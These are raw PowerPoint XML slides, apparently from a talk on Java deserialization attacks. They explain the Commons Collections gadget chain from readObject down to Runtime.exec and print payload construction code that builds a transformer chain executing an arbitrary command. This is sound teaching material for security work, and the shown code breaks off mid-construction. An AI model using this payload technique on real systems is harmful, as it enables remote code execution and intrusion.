        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700416" y="4086225"/>
            <a:ext cx="7626350" cy="1685925"/>
          </a:xfrm>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>InvokerTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> extends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2" tooltip="class or interface in java.lang"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> implements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3" tooltip="interface in org.apache.commons.collections"/>
              </a:rPr>
              <a:t>Transformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4" tooltip="class or interface in java.io"/>
              </a:rPr>
              <a:t>Serializable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Transformer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>implementation that creates a new object instance by reflection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1724025"/>
            <a:ext cx="7626096" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Define a set of transformers that will execute arbitrary code when called to convert an object we don’t care about</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> into an object we don’t care about.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704851" y="3714750"/>
            <a:ext cx="990599" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Key Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173528147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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deserialization Call Chain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000125" y="1407061"/>
            <a:ext cx="7311771" cy="4448175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk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dirty="0" err="1" smtClean="0"/>
              <a:t>ObjectInputStream.readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AnnotationInvocationHandler.readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Map(Proxy).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>entrySet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AnnotationInvocationHandler.invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LazyMap.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ChainedTransformer.transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ConstantTransformer.transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InvokerTransformer.transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>							</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Method.invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>								</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Class.getMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InvokerTransformer.transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>							</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Method.invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>								</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InvokerTransformer.transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>							</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Method.invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>								</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Runtime.exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285208297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Payload Construction</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="949845"/>
            <a:ext cx="7626096" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk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sz="1600" dirty="0" smtClean="0"/>
              <a:t>final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execArgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = new String[] { command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>}; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Transformer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>transformerChain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ChainedTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(  // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>inert chain for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>setup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	new Transformer[]{ new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ConstantTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Transformer[] transformers = new Transformer[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>{  // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>real chain for after setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ConstantTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Runtime.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>InvokerTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>getMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>", new Class[] {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>String.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, Class[].class }, new Object[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>{ "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>", new Class[0] }),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>InvokerTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>("invoke", new Class[] {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Object.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, Object[].class }, new Object[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	null, new Object[0] }),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>InvokerTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>("exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>", new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Class[] { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>String.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> }, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execArgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ConstantTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(1) };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>innerMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>HashMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>lazyMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>LazyMap.decorate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>innerMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>transformerChain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>mapProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Gadgets.createMemoitizedProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>lazyMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Map.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
